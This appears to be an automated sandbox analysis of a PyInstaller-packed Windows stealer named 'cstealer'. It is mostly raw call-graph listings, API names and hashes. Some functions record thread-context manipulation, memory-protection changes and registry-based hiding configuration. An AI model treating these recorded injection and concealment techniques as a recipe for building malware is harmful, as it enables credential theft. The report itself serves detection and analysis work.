88414->88411 88414->88412 88420 7ff6957f140c 88414->88420 88416->88292 88417->88307 88418->88307 88419->88307 88421 7ff6957f143c 88420->88421 88428 7ff6957f115c 88421->88428 88423 7ff6957f145a 88423->88414 88424->88403 88425->88411 88426->88411 88427->88411 88429 7ff6957f11a9 88428->88429 88430 7ff6957f117c 88428->88430 88429->88423 88430->88429 88431 7ff6957f11b1 88430->88431 88432 7ff6957f1186 88430->88432 88435 7ff6957f109c 88431->88435 88442 7ff6957fb5cc 37 API calls 2 library calls 88432->88442 88443 7ff6957f5b5c EnterCriticalSection 88435->88443 88437 7ff6957f10b9 88438 7ff6957f10dc 74 API calls 88437->88438 88439 7ff6957f10c2 88438->88439 88440 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88439->88440 88441 7ff6957f10cd 88440->88441 88441->88429 88442->88429 88444->88310 88446 7ff6957ebfb0 88445->88446 88447 7ff6957e25f9 GetModuleHandleW 88446->88447 88448 7ff6957e2635 memcpy_s 88447->88448 88464 7ff6957e2810 88448->88464 88450 7ff6957e2679 memcpy_s 88468 7ff6957f7ee4 88450->88468 88453 7ff6957f7ee4 37 API calls 88454 7ff6957e26ac 88453->88454 88455 7ff6957f7ee4 37 API calls 88454->88455 88456 7ff6957e26b9 DialogBoxIndirectParamW 88455->88456 88457 7ff6957e26ef __std_exception_destroy 88456->88457 88458 7ff6957e2715 88457->88458 88459 7ff6957e270f DeleteObject 88457->88459 88460 7ff6957e2721 DestroyIcon 88458->88460 88461 7ff6957e2727 88458->88461 88459->88458 88460->88461 88462 7ff6957ec010 _wfindfirst32i64 8 API calls 88461->88462 88463 7ff6957e2738 88462->88463 88463->88322 88465 7ff6957e2835 88464->88465 88476 7ff6957f5508 88465->88476 88469 7ff6957f7f02 88468->88469 88472 7ff6957e269f 88468->88472 88469->88472 88499 7ff695801344 37 API calls 2 library calls 88469->88499 88471 7ff6957f7f31 88471->88472 88473 7ff6957f7f51 88471->88473 88472->88453 88500 7ff6957fb6b8 17 API calls _wfindfirst32i64 88473->88500 88477 7ff6957f5562 88476->88477 88478 7ff6957f5587 88477->88478 88480 7ff6957f55c3 88477->88480 88494 7ff6957fb5cc 37 API calls 2 library calls 
88478->88494 88495 7ff6957f38c0 48 API calls _invalid_parameter_noinfo 88480->88495 88482 7ff6957f55b1 88484 7ff6957ec010 _wfindfirst32i64 8 API calls 88482->88484 88483 7ff6957f56a4 88498 7ff6957fb700 11 API calls 2 library calls 88483->88498 88487 7ff6957e2854 88484->88487 88486 7ff6957f565e 88486->88483 88488 7ff6957f56ca 88486->88488 88489 7ff6957f5679 88486->88489 88492 7ff6957f5670 88486->88492 88487->88450 88488->88483 88490 7ff6957f56d4 88488->88490 88496 7ff6957fb700 11 API calls 2 library calls 88489->88496 88497 7ff6957fb700 11 API calls 2 library calls 88490->88497 88492->88483 88492->88489 88494->88482 88495->88486 88496->88482 88497->88482 88498->88482 88499->88471 88502 7ff6957e2d66 88501->88502 88503 7ff6957e1ee0 49 API calls 88502->88503 88505 7ff6957e2d99 88503->88505 88504 7ff6957e30ca 88505->88504 88553 7ff6957e3e80 49 API calls 88505->88553 88507 7ff6957e2e07 88554 7ff6957e3e80 49 API calls 88507->88554 88509 7ff6957e2e18 88510 7ff6957e2e75 88509->88510 88511 7ff6957e2e39 88509->88511 88513 7ff6957e3190 75 API calls 88510->88513 88555 7ff6957e3190 88511->88555 88514 7ff6957e2e73 88513->88514 88515 7ff6957e2eb4 88514->88515 88516 7ff6957e2ef6 88514->88516 88563 7ff6957e77b0 129 API calls 3 library calls 88515->88563 88518 7ff6957e3190 75 API calls 88516->88518 88520 7ff6957e2f20 88518->88520 88519 7ff6957e2ece 88521 7ff6957e3151 88519->88521 88522 7ff6957e2ed7 88519->88522 88523 7ff6957e3190 75 API calls 88520->88523 88530 7ff6957e2fbc 88520->88530 88570 7ff6957e2b10 59 API calls 2 library calls 88521->88570 88564 7ff6957e2b10 59 API calls 2 library calls 88522->88564 88526 7ff6957e2f52 88523->88526 88525 7ff6957e1ea0 59 API calls 88528 7ff6957e300f 88525->88528 88526->88530 88531 7ff6957e3190 75 API calls 88526->88531 88527 7ff6957e2ef1 88532 7ff6957ec010 _wfindfirst32i64 8 API calls 88527->88532 88528->88504 88534 7ff6957e1ee0 49 API calls 88528->88534 88530->88525 88541 7ff6957e30cf 88530->88541 88533 7ff6957e2f80 88531->88533 88535 
7ff6957e2fb1 88532->88535 88533->88530 88537 7ff6957e2f84 88533->88537 88536 7ff6957e3037 88534->88536 88535->88034 88536->88521 88540 7ff6957e1ee0 49 API calls 88536->88540 88565 7ff6957e2b10 59 API calls 2 library calls 88537->88565 88543 7ff6957e3064 88540->88543 88544 7ff6957e3128 88541->88544 88567 7ff6957f5824 45 API calls 2 library calls 88541->88567 88543->88521 88545 7ff6957e1ee0 49 API calls 88543->88545 88544->88521 88568 7ff6957e2b10 59 API calls 2 library calls 88544->88568 88569 7ff6957e1700 135 API calls 2 library calls 88544->88569 88547 7ff6957e3091 88545->88547 88547->88521 88548 7ff6957e1a90 121 API calls 88547->88548 88549 7ff6957e30b3 88548->88549 88549->88541 88550 7ff6957e30b7 88549->88550 88566 7ff6957e2b10 59 API calls 2 library calls 88550->88566 88552->88034 88553->88507 88554->88509 88556 7ff6957e31c4 88555->88556 88571 7ff6957f52b4 88556->88571 88559 7ff6957e31fb 88561 7ff6957ec010 _wfindfirst32i64 8 API calls 88559->88561 88562 7ff6957e3219 88561->88562 88562->88514 88563->88519 88564->88527 88565->88527 88566->88504 88567->88541 88568->88544 88569->88544 88570->88504 88572 7ff6957f530e 88571->88572 88573 7ff6957f5333 88572->88573 88575 7ff6957f536f 88572->88575 88606 7ff6957fb5cc 37 API calls 2 library calls 88573->88606 88607 7ff6957f3540 49 API calls _invalid_parameter_noinfo 88575->88607 88577 7ff6957f535d 88580 7ff6957ec010 _wfindfirst32i64 8 API calls 88577->88580 88578 7ff6957f544c 88610 7ff6957fb700 11 API calls 2 library calls 88578->88610 88581 7ff6957e31ea 88580->88581 88581->88559 88589 7ff6957f65dc 88581->88589 88582 7ff6957f5406 88582->88578 88583 7ff6957f5470 88582->88583 88584 7ff6957f5421 88582->88584 88586 7ff6957f5418 88582->88586 88583->88578 88587 7ff6957f547a 88583->88587 88608 7ff6957fb700 11 API calls 2 library calls 88584->88608 88586->88578 88586->88584 88609 7ff6957fb700 11 API calls 2 library calls 88587->88609 88590 7ff6957f6605 88589->88590 88591 7ff6957f65f9 88589->88591 88636 7ff6957f5788 45 API calls 
__CxxCallCatchBlock 88590->88636 88611 7ff6957f5ef0 88591->88611 88594 7ff6957f662d 88597 7ff6957f663d 88594->88597 88637 7ff6957ffbd4 5 API calls __crtLCMapStringW 88594->88637 88595 7ff6957f65fe 88595->88559 88638 7ff6957f5d74 14 API calls 3 library calls 88597->88638 88599 7ff6957f6695 88600 7ff6957f66ad 88599->88600 88601 7ff6957f6699 88599->88601 88602 7ff6957f5ef0 69 API calls 88600->88602 88601->88595 88639 7ff6957fb700 11 API calls 2 library calls 88601->88639 88604 7ff6957f66b9 88602->88604 88604->88595 88640 7ff6957fb700 11 API calls 2 library calls 88604->88640 88606->88577 88607->88582 88608->88577 88609->88577 88610->88577 88612 7ff6957f5f0a 88611->88612 88613 7ff6957f5f27 88611->88613 88641 7ff6957f5c94 11 API calls _get_daylight 88612->88641 88613->88612 88614 7ff6957f5f3a CreateFileW 88613->88614 88616 7ff6957f5fa4 88614->88616 88617 7ff6957f5f6e 88614->88617 88645 7ff6957f64cc 46 API calls 3 library calls 88616->88645 88644 7ff6957f6044 59 API calls 3 library calls 88617->88644 88618 7ff6957f5f0f 88642 7ff6957f5cb4 11 API calls _get_daylight 88618->88642 88622 7ff6957f5f7c 88625 7ff6957f5f83 CloseHandle 88622->88625 88626 7ff6957f5f99 CloseHandle 88622->88626 88623 7ff6957f5fa9 88627 7ff6957f5fad 88623->88627 88628 7ff6957f5fd8 88623->88628 88624 7ff6957f5f17 88643 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88624->88643 88630 7ff6957f5f22 88625->88630 88626->88630 88646 7ff6957f5c28 11 API calls 2 library calls 88627->88646 88647 7ff6957f628c 51 API calls 88628->88647 88630->88595 88633 7ff6957f5fe5 88648 7ff6957f63c8 21 API calls _fread_nolock 88633->88648 88635 7ff6957f5fb7 88635->88630 88636->88594 88637->88597 88638->88599 88639->88595 88640->88595 88641->88618 88642->88624 88644->88622 88645->88623 88646->88635 88647->88633 88648->88635 88650 7ff6957f6918 88649->88650 88651 7ff6957f693e 88650->88651 88654 7ff6957f6971 88650->88654 88680 7ff6957f5cb4 11 API calls _get_daylight 88651->88680 88653 7ff6957f6943 88681 7ff6957fb698 37 API 
calls _invalid_parameter_noinfo 88653->88681 88656 7ff6957f6984 88654->88656 88657 7ff6957f6977 88654->88657 88668 7ff6957fb9e0 88656->88668 88682 7ff6957f5cb4 11 API calls _get_daylight 88657->88682 88660 7ff6957e40b9 88660->88045 88662 7ff6957f69a5 88675 7ff695800da4 88662->88675 88663 7ff6957f6998 88683 7ff6957f5cb4 11 API calls _get_daylight 88663->88683 88666 7ff6957f69b8 88684 7ff6957f5b68 LeaveCriticalSection 88666->88684 88685 7ff6958011a8 EnterCriticalSection 88668->88685 88670 7ff6957fb9f7 88671 7ff6957fba54 19 API calls 88670->88671 88672 7ff6957fba02 88671->88672 88673 7ff695801208 _isindst LeaveCriticalSection 88672->88673 88674 7ff6957f698e 88673->88674 88674->88662 88674->88663 88686 7ff695800aa0 88675->88686 88678 7ff695800dfe 88678->88666 88680->88653 88682->88660 88683->88660 88687 7ff695800adb __vcrt_FlsAlloc 88686->88687 88696 7ff695800ca2 88687->88696 88701 7ff6958071a4 51 API calls 3 library calls 88687->88701 88689 7ff695800d79 88705 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88689->88705 88691 7ff695800cab 88691->88678 88698 7ff695807e8c 88691->88698 88693 7ff695800d0d 88693->88696 88702 7ff6958071a4 51 API calls 3 library calls 88693->88702 88695 7ff695800d2c 88695->88696 88703 7ff6958071a4 51 API calls 3 library calls 88695->88703 88696->88691 88704 7ff6957f5cb4 11 API calls _get_daylight 88696->88704 88706 7ff69580748c 88698->88706 88701->88693 88702->88695 88703->88696 88704->88689 88707 7ff6958074a3 88706->88707 88708 7ff6958074c1 88706->88708 88760 7ff6957f5cb4 11 API calls _get_daylight 88707->88760 88708->88707 88711 7ff6958074dd 88708->88711 88710 7ff6958074a8 88761 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88710->88761 88717 7ff695807a9c 88711->88717 88715 7ff6958074b4 88715->88678 88763 7ff6958077d0 88717->88763 88720 7ff695807b11 88795 7ff6957f5c94 11 API calls _get_daylight 88720->88795 88721 7ff695807b29 88783 7ff6957f8c58 88721->88783 88739 7ff695807b16 88796 7ff6957f5cb4 11 API calls _get_daylight 
88739->88796 88752 7ff695807508 88752->88715 88762 7ff6957f8c30 LeaveCriticalSection 88752->88762 88760->88710 88764 7ff6958077fc 88763->88764 88772 7ff695807816 88763->88772 88764->88772 88808 7ff6957f5cb4 11 API calls _get_daylight 88764->88808 88766 7ff69580780b 88809 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88766->88809 88768 7ff6958078e5 88779 7ff695807942 88768->88779 88814 7ff6957fa92c 37 API calls 2 library calls 88768->88814 88769 7ff695807894 88769->88768 88812 7ff6957f5cb4 11 API calls _get_daylight 88769->88812 88772->88769 88810 7ff6957f5cb4 11 API calls _get_daylight 88772->88810 88773 7ff69580793e 88776 7ff6958079c0 88773->88776 88773->88779 88774 7ff6958078da 88813 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88774->88813 88815 7ff6957fb6b8 17 API calls _wfindfirst32i64 88776->88815 88778 7ff695807889 88811 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88778->88811 88779->88720 88779->88721 88816 7ff6958011a8 EnterCriticalSection 88783->88816 88795->88739 88796->88752 88808->88766 88810->88778 88812->88774 88814->88773 88818 7ff6957f98c4 88817->88818 88821 7ff6957f93a0 88818->88821 88820 7ff6957f98dd 88820->88055 88822 7ff6957f93bb 88821->88822 88823 7ff6957f93ea 88821->88823 88832 7ff6957fb5cc 37 API calls 2 library calls 88822->88832 88831 7ff6957f5b5c EnterCriticalSection 88823->88831 88826 7ff6957f93db 88826->88820 88827 7ff6957f93ef 88828 7ff6957f940c 38 API calls 88827->88828 88829 7ff6957f93fb 88828->88829 88830 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88829->88830 88830->88826 88832->88826 88834 7ff6957f0773 88833->88834 88835 7ff6957f07a1 88833->88835 88844 7ff6957fb5cc 37 API calls 2 library calls 88834->88844 88837 7ff6957f0793 88835->88837 88843 7ff6957f5b5c EnterCriticalSection 88835->88843 88837->88059 88839 7ff6957f07b8 88840 7ff6957f07d4 72 API calls 88839->88840 88841 7ff6957f07c4 88840->88841 88842 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88841->88842 88842->88837 88844->88837 88845 271dc675cf0 
88846 271dc675cfd 88845->88846 88847 271dc675d09 88846->88847 88854 271dc675e1a 88846->88854 88848 271dc675d3e 88847->88848 88849 271dc675d8d 88847->88849 88850 271dc675d66 SetThreadContext 88848->88850 88850->88849 88851 271dc675e41 VirtualProtect FlushInstructionCache 88851->88854 88852 271dc675efe 88853 271dc675f1e 88852->88853 88867 271dc6743e0 VirtualFree 88852->88867 88863 271dc674df0 GetCurrentProcess 88853->88863 88854->88851 88854->88852 88857 271dc675f23 88858 271dc675f37 ResumeThread 88857->88858 88859 271dc675f77 88857->88859 88860 271dc675f6b 88858->88860 88868 271dc677940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 88859->88868 88860->88857 88862 271dc675fbf 88866 271dc674e0c 88863->88866 88864 271dc674e53 88864->88857 88865 271dc674e22 VirtualProtect FlushInstructionCache 88865->88866 88866->88864 88866->88865 88867->88853 88868->88862 88869 271dc67554d 88870 271dc675554 88869->88870 88871 271dc6755bb 88870->88871 88872 271dc675637 VirtualProtect 88870->88872 88873 271dc675663 GetLastError 88872->88873 88874 271dc675671 88872->88874 88873->88874 88875 271dc671abc 88881 271dc671628 GetProcessHeap 88875->88881 88877 271dc671ad2 Sleep SleepEx 88879 271dc671acb 88877->88879 88879->88877 88880 271dc671598 StrCmpIW StrCmpW 88879->88880 88926 271dc6718b4 9 API calls 88879->88926 88880->88879 88882 271dc671648 _invalid_parameter_noinfo 88881->88882 88927 271dc671268 GetProcessHeap 88882->88927 88884 271dc671650 88885 271dc671268 2 API calls 88884->88885 88886 271dc671661 88885->88886 88887 271dc671268 2 API calls 88886->88887 88888 271dc67166a 88887->88888 88889 271dc671268 2 API calls 88888->88889 88890 271dc671673 88889->88890 88891 271dc67168e RegOpenKeyExW 88890->88891 88892 271dc6718a6 88891->88892 88893 271dc6716c0 RegOpenKeyExW 88891->88893 88892->88879 88894 271dc6716ff RegOpenKeyExW 88893->88894 88895 271dc6716e9 88893->88895 88897 271dc671723 88894->88897 88898 271dc67173a RegOpenKeyExW 88894->88898 
88931 271dc6712bc 11 API calls 2 library calls 88895->88931 88932 271dc67104c 4 API calls 2 library calls 88897->88932 88899 271dc671775 RegOpenKeyExW 88898->88899 88900 271dc67175e 88898->88900 88904 271dc6717b0 RegOpenKeyExW 88899->88904 88905 271dc671799 88899->88905 88933 271dc6712bc 11 API calls 2 library calls 88900->88933 88901 271dc6716f5 RegCloseKey 88901->88894 88909 271dc6717d4 88904->88909 88910 271dc6717eb RegOpenKeyExW 88904->88910 88934 271dc6712bc 11 API calls 2 library calls 88905->88934 88906 271dc671730 RegCloseKey 88906->88898 88907 271dc67176b RegCloseKey 88907->88899 88935 271dc6712bc 11 API calls 2 library calls 88909->88935 88913 271dc671826 RegOpenKeyExW 88910->88913 88914 271dc67180f 88910->88914 88911 271dc6717a6 RegCloseKey 88911->88904 88915 271dc671861 RegOpenKeyExW 88913->88915 88916 271dc67184a 88913->88916 88936 271dc67104c 4 API calls 2 library calls 88914->88936 88920 271dc671885 88915->88920 88921 271dc67189c RegCloseKey 88915->88921 88937 271dc67104c 4 API calls 2 library calls 88916->88937 88917 271dc6717e1 RegCloseKey 88917->88910 88938 271dc67104c 4 API calls 2 library calls 88920->88938 88921->88892 88922 271dc67181c RegCloseKey 88922->88913 88923 271dc671857 RegCloseKey 88923->88915 88925 271dc671892 RegCloseKey 88925->88921 88939 271dc686168 88927->88939 88929 271dc671283 GetProcessHeap 88930 271dc6712ae _invalid_parameter_noinfo 88929->88930 88930->88884 88931->88901 88932->88906 88933->88907 88934->88911 88935->88917 88936->88922 88937->88923 88938->88925 88940 271dc673ab9 88944 271dc673a06 88940->88944 88941 271dc673a70 88942 271dc673a56 VirtualQuery 88942->88941 88942->88944 88943 271dc673a8a VirtualAlloc 88943->88941 88945 271dc673abb GetLastError 88943->88945 88944->88941 88944->88942 88944->88943 88945->88941 88945->88944 88946 271dc64273c 88947 271dc64276a 88946->88947 88948 271dc6427c5 VirtualAlloc 88947->88948 88951 271dc6428d4 88947->88951 88950 271dc6427ec 88948->88950 88948->88951 88949 271dc642858 
LoadLibraryA 88949->88950 88950->88949 88950->88951

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction ID: 9da9c09ea11b973f36e3bb18168d8985121fb6f06b451637f1a977ffd48ce2a2
                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction Fuzzy Hash: 1371F27631AA1189EF309FA9E85879933B4FF44B88F401912DE4D57BA9EF38C464CB44
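The metadata block above is what an analyst would copy into a hunt: the registry key and value names under SOFTWARE\dialerconfig, the API families, the dump region and the instruction fuzzy hash. The parser below is an added example (not code from the report or from Joe Sandbox) that turns such a block into a structured record. It assumes that Joe Sandbox joins several strings or API families with `$`, and that the first two dotted fields of the .sdmp name are the process index and the dump phase (they match the `3_2` in the snapshot file name); both are assumptions about the export format, not something the page states.

```python
"""Extract hunting artefacts from a Joe Sandbox per-function metadata block.

Parses the bullet lines of a function block ('Source File', 'Snapshot File',
'API ID', 'String ID', 'Instruction Fuzzy Hash') into a dict.
Assumptions: '$' joins multiple strings/API families, and the first two
dotted fields of the .sdmp name are the process index and dump phase
(they match the '3_2' in the snapshot file name).
"""
import re

# Constructed sample: the metadata block for the 0x271DC670000 region,
# copied from the report as plain text.
SAMPLE_BLOCK = """\
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• Instruction Fuzzy Hash: 1371F27631AA1189EF309FA9E85879933B4FF44B88F401912DE4D57BA9EF38C464CB44
"""

_FIELD = re.compile(r"^\s*[•*-]?\s*([A-Za-z ]+):\s*(.*)$")
# <process>.<phase>.<id>.<base>.<...>.sdmp  (field meaning is an assumption)
_SDMP = re.compile(r"^(\d+)\.(\d+)\.\d+\.([0-9A-Fa-f]+)\.")
_REG_PREFIXES = ("software\\", "system\\", "hklm\\", "hkcu\\", "hkey_")


def _split(joined: str) -> list:
    """Split a '$'-joined Joe Sandbox list, dropping empty items."""
    return [item for item in joined.split("$") if item]


def parse_block(text: str) -> dict:
    """Return the block's fields as a dict ready for a hunt query."""
    fields = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()

    out = {}
    src = fields.get("Source File", "")
    m = _SDMP.match(src)
    if m:
        out["process_index"] = int(m.group(1))
        out["dump_phase"] = int(m.group(2))
        out["base_address"] = int(m.group(3), 16)
    out["pe_backed"] = "based on PE: true" in src
    out["snapshot"] = fields.get("Snapshot File")
    out["api_families"] = _split(fields.get("API ID", ""))
    out["strings"] = _split(fields.get("String ID", ""))
    # Registry paths are the strings worth a hunt query on their own.
    out["registry_keys"] = [s for s in out["strings"]
                            if s.lower().startswith(_REG_PREFIXES)]
    out["fuzzy_hash"] = fields.get("Instruction Fuzzy Hash")
    return out


if __name__ == "__main__":
    import json
    print(json.dumps(parse_block(SAMPLE_BLOCK), indent=2))
```

The remaining strings (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp) read like value names under that key, which is what the RegOpenKeyExW/RegQueryValue API family in the same block suggests; a host check for SOFTWARE\dialerconfig and those value names is the natural follow-up.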

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
[Basic-block list for the function at 0x7FF6957E1000 from the interactive graph viewer, not reproduced. Windows API nodes in this function: SetDllDirectoryW, PostMessageW, GetMessageW; the remaining nodes are calls into other bootloader functions in the 0x7FF6957E0000 module.]
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                            • API String ID: 2647325126-1544818733
                                                                                                                                                            • Opcode ID: c58022dafef2daa97a35f7e98ade3fced550866366077b7cc029f32b0c993c89
                                                                                                                                                            • Instruction ID: de8e0c548993f7f47575c4b1db8cc1327bee43c35e005f64ed431a28b46d9ed9
                                                                                                                                                            • Opcode Fuzzy Hash: c58022dafef2daa97a35f7e98ade3fced550866366077b7cc029f32b0c993c89
                                                                                                                                                            • Instruction Fuzzy Hash: 9DC16F21B0C79691EA35EB31A5512FD62D1EF44F84F4041B6EA4ECB6A6DE2CFE098710

Control-flow Graph (function starting at 7ff695807a9c; one basic block per line: node id, address range, calls made in the block, successor nodes)
• 387: 7ff695807a9c-7ff695807b0f, call 7ff6958077d0 -> 390, 391
• 390: 7ff695807b11-7ff695807b1a, call 7ff6957f5c94 -> 398
• 391: 7ff695807b29-7ff695807b33, call 7ff6957f8c58 -> 396, 397
• 396: 7ff695807b35-7ff695807b4c, call 7ff6957f5c94, call 7ff6957f5cb4 -> 398
• 397: 7ff695807b4e-7ff695807bb7, CreateFileW -> 400, 401
• 398: 7ff695807b1d-7ff695807b24, call 7ff6957f5cb4 -> 414
• 400: 7ff695807c34-7ff695807c3f, GetFileType -> 407, 408
• 401: 7ff695807bb9-7ff695807bbf -> 404, 405
• 404: 7ff695807c01-7ff695807c2f, GetLastError, call 7ff6957f5c28 -> 398
• 405: 7ff695807bc1-7ff695807bc5 -> 404, 412
• 407: 7ff695807c92-7ff695807c99 -> 410, 411
• 408: 7ff695807c41-7ff695807c7c, GetLastError, call 7ff6957f5c28, CloseHandle -> 398, 421
• 410: 7ff695807ca1-7ff695807ca4 -> 417, 418
• 411: 7ff695807c9b-7ff695807c9f -> 417
• 412: 7ff695807bc7-7ff695807bff, CreateFileW -> 400, 404
• 414: 7ff695807e6a-7ff695807e8a (no successors listed)
• 417: 7ff695807caa-7ff695807cff, call 7ff6957f8b70 -> 426, 427
• 418: 7ff695807ca6 -> 417
• 421: 7ff695807c82-7ff695807c8d, call 7ff6957f5cb4 -> 398
• 426: 7ff695807d01-7ff695807d0d, call 7ff6958079d8 -> 427, 434
• 427: 7ff695807d1e-7ff695807d4f, call 7ff695807550 -> 432, 433
• 432: 7ff695807d55-7ff695807d97 -> 436, 437
• 433: 7ff695807d51-7ff695807d53 -> 435
• 434: 7ff695807d0f -> 435
• 435: 7ff695807d11-7ff695807d19, call 7ff6957fb878 -> 414
• 436: 7ff695807db9-7ff695807dc4 -> 439, 440
• 437: 7ff695807d99-7ff695807d9d -> 436, 438
• 438: 7ff695807d9f-7ff695807db4 -> 436
• 439: 7ff695807dca-7ff695807dce -> 440, 443
• 440: 7ff695807e68 -> 414
• 443: 7ff695807dd4-7ff695807e19, CloseHandle, CreateFileW -> 444, 445
• 444: 7ff695807e4e-7ff695807e63 -> 440
• 445: 7ff695807e1b-7ff695807e49, GetLastError, call 7ff6957f5c28, call 7ff6957f8d98 -> 444
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
• Instruction ID: f91bee172fd8944fde339852eda1f98a28153eacfb765be0aa7ba2c084433dcd
• Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
• Instruction Fuzzy Hash: CBC1AE32B29A5685EB20CF74C5906BC37A1EB49FA8B014266DE1EDB3D5CF38E955C700

APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
• Instruction ID: ad6fdc4bbfc3f5f58fe21f050ea44ead8b2cd4d6c2ea76146f8f409dc23eb54d
• Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
• Instruction Fuzzy Hash: 3AF08122A1978186E7B0CF60B4887B6B390EB44B24F040736D66D466E4DF3CD50C8B00

APIs
Memory Dump Source
• Source File: 00000003.00000002.2714325177.00007FF8A48F1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8A48F0000, based on PE: true
• Associated: 00000003.00000002.2714275886.00007FF8A48F0000.00000002.00000001.01000000.00000019.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff8a48f0000_cstealer.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
• Instruction ID: 4d3bd78b8807d4a24e19804f017a248f4d910cf8339e1cb4c9b271dd76f99f82
• Opcode Fuzzy Hash: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
• Instruction Fuzzy Hash: E6A1F725B0BB47A5FE558B55B8D12382294FF44BC8F644576CA0E4BBB0EFACB491C340

Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
